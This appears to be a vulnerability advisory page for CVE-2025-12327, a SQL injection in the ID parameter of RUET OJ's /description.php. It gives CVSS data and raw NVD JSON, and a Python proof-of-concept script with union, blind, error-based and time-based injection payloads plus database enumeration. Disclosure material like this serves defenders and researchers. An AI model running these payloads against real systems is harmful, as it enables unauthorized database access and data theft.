Security Vulnerability Report
中文
CVE-2025-12327 CVSS 6.3 MEDIUM

CVE-2025-12327

Published: 2025-10-27 21:15:37
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was determined in shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5. This issue affects some unknown processing of the file /description.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:shawonruet:ruet_oj:*:*:*:*:*:*:*:* - VULNERABLE
shawon100 RUET OJ <= 18fa45b0a669fa1098a0b8fc629cf6856369d9a5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12327 SQL Injection PoC for RUET OJ /description.php # Target: shawon100 RUET OJ up to commit 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 def exploit_sqli(target_url, payload): """ SQL Injection exploit for /description.php The ID parameter is vulnerable to SQL injection """ # Target endpoint with vulnerable ID parameter url = f"{target_url}/description.php" # Test payloads for different SQL injection techniques payloads = { 'union_based': "1' UNION SELECT 1,2,3,4,5-- -", 'boolean_blind': "1' AND 1=1-- -", 'error_based': "1' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))-- -", 'time_based': "1' AND SLEEP(5)-- -" } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Use provided payload or default to union-based if payload == 'auto': payload = payloads['union_based'] params = {'ID': payload} try: print(f"[*] Sending payload: {payload}") print(f"[*] Target: {url}") response = requests.get(url, params=params, headers=headers, timeout=30) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def extract_data(target_url): """ Extract database information using blind SQL injection """ # Database enumeration payload db_enum = "1' AND SUBSTRING((SELECT database()),1,1)='r'-- -" # Test if database name starts with 'r' print("[*] Attempting database enumeration...") result = exploit_sqli(target_url, db_enum) if result and 'error' not in result.lower(): print("[+] Database name likely starts with 'r'") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-12327.py <target_url> [payload]") print("Example: python cve-2025-12327.py http://target.com/ruet-oj") sys.exit(1) target = sys.argv[1] payload = sys.argv[2] if len(sys.argv) > 2 else 'auto' exploit_sqli(target, payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12327", "sourceIdentifier": "[email protected]", "published": "2025-10-27T21:15:36.713", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5. This issue affects some unknown processing of the file /description.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shawonruet:ruet_oj:*:*:*:*:*:*:*:*", "versionEndIncluding": "2022-10-19", "matchCriteriaId": "A49CA863-91A0-43A6-81AF-E57886D0E879"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.330104", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330104", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674349", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.